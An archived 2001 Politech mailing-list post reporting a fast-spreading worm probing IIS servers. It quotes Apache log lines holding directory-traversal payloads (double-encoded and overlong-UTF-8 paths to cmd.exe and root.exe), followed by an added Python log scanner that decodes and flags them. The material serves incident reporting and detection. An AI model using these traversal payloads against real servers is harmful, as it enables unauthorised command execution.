[BTW I'm seeing similar attempts on Politech's website. Remember, folks, Code Red and its progeny only infect Windows systems. --Declan]

**********

Date: Tue, 18 Sep 2001 11:34:26 -0400
From: Rich Kulawiec <rskat_private>
To: Declan McCullagh <declanat_private>
Subject: It would appear that a 'Code Red' worm variant is in the wild

I'm seeing reports on nanog, inet-access, and isp-webhosting about this; a fast look at my own web servers indicates that it's real, and that the hits are coming at a ferocious rate. (I would guesstimate at 10x the rate at which Code Red hit.) This seems to have started within the last few hours; the first entry in my logs is from 0930 EDT today.

Here's a snippet from the Apache error log; this appears to constitute the signature of this worm:

A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
A.B.C.D - - [18/Sep/2001:11:30:13 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
A.B.C.D - - [18/Sep/2001:11:30:18 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

So far, all hits have come in groups of 16 and appear to be directed at exploiting a vulnerability that's presumably found on Windows systems running IIS. They also *seem* to be largely localized, that is, the IP addresses of the incoming probes are related to the IP addresses of the systems being targeted.

The sad part about this is that chunks of the 'net are already bottlenecked under the load caused by the past weeks' events and the attempts to disseminate information about them, including photos of missing persons, etc.

---Rsk
Rich Kulawiec
rskat_private

-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
Declan McCullagh's photographs are at http://www.mccullagh.org/
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
-------------------------------------------------------------------------
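The sixteen requests quoted in the message above are what the probes look like from an Apache access log. The script below is an added example written for this archive page; it is not part of the original message and not the worm's, Apache's or IIS's code. It parses common-log-format lines, emulates the lenient decoding the probes rely on (repeated percent-decoding, so %255c and %%35%63 both end up as a backslash, and unchecked two-byte decoding of a 0xC0/0xC1 lead byte, which turns the overlong %c0%af into '/' and %c1%9c or %c1%1c into '\'), canonicalises the path, and reports which requests resolve to cmd.exe or root.exe and how many of them came from each source address. The log lines in SAMPLE_LOG are constructed for the example, with private and documentation addresses in place of the A.B.C.D in the message; the decoder is an emulation for this example, not the actual IIS code path, and the per-source counter is simply a way to see the "groups of 16" the message describes.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Apache common log format, one request per line, as in the snippet above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Files the probes are after, matched against the canonicalised path.
TARGETS = ("/winnt/system32/cmd.exe", "/root.exe")

# Constructed sample modelled on the lines in the message (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:11:30:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
10.0.0.5 - - [18/Sep/2001:11:30:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
10.0.0.5 - - [18/Sep/2001:11:30:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
10.0.0.5 - - [18/Sep/2001:11:30:13 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
10.0.0.5 - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
10.0.0.5 - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
192.0.2.9 - - [18/Sep/2001:11:31:02 -0400] "GET /index.html HTTP/1.0" 200 1043
192.0.2.9 - - [18/Sep/2001:11:31:05 -0400] "GET /docs/../images/logo.gif HTTP/1.0" 200 5120
"""


def lenient_decode(path: str) -> str:
    """Decode a request path the way the probes expect a permissive server to.

    1. Percent-decode repeatedly until nothing changes, so the double-encoded
       %255c and the malformed %%35%63 / %25%35%63 all become a backslash.
    2. Decode any two-byte sequence with lead byte 0xC0/0xC1 with the
       unchecked formula ((b0 & 0x1F) << 6) | (b1 & 0x3F); that maps the
       overlong %c0%af to '/' and %c1%9c or %c1%1c to a backslash.
    This is an emulation written for this example, not IIS's own decoder.
    """
    data = path.encode("latin-1")
    for _ in range(5):                      # bounded; stops once stable
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    out = bytearray()
    i = 0
    while i < len(data):
        b0 = data[i]
        if b0 in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b0 & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b0)
            i += 1
    return out.decode("latin-1")


def canonicalize(raw_path: str) -> dict:
    """Split off the query, decode, fold backslashes to slashes and resolve
    '..' segments.  'escapes' counts how often the path climbed above the
    root, which is the traversal these probes depend on."""
    path, _, query = raw_path.partition("?")
    decoded = lenient_decode(path).replace("\\", "/")
    segments, escapes = [], 0
    for seg in decoded.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            else:
                escapes += 1
        else:
            segments.append(seg)
    canonical = "/" + "/".join(segments).lower()
    return {"canonical": canonical, "escapes": escapes, "query": query,
            "probe": canonical.endswith(TARGETS)}


def scan(log_text: str) -> list:
    """Parse each line and return the requests that resolve to a probe target."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # not common log format; skip
        info = canonicalize(m["path"])
        if info["probe"]:
            hits.append({"ip": m["ip"], "ts": m["ts"], "raw": m["path"],
                         "status": int(m["status"]), **info})
    return hits


def per_source(hits: list) -> Counter:
    """Probe hits per source address; a burst of 16 from one address within
    a few seconds is the pattern the message describes."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["raw"]!r:62} -> {h["canonical"]} '
              f'(climbed {h["escapes"]}, query {h["query"]!r})')
    print(per_source(found))
```

The Apache status codes in the sample (404, or 400 for the malformed %%35 form) show the probes failing, as they do against any non-IIS server; what the per-source count adds is the burst pattern, which is the useful signal for blocking or rate-limiting a scanning host rather than any single URL.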
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 12:44:04 PDT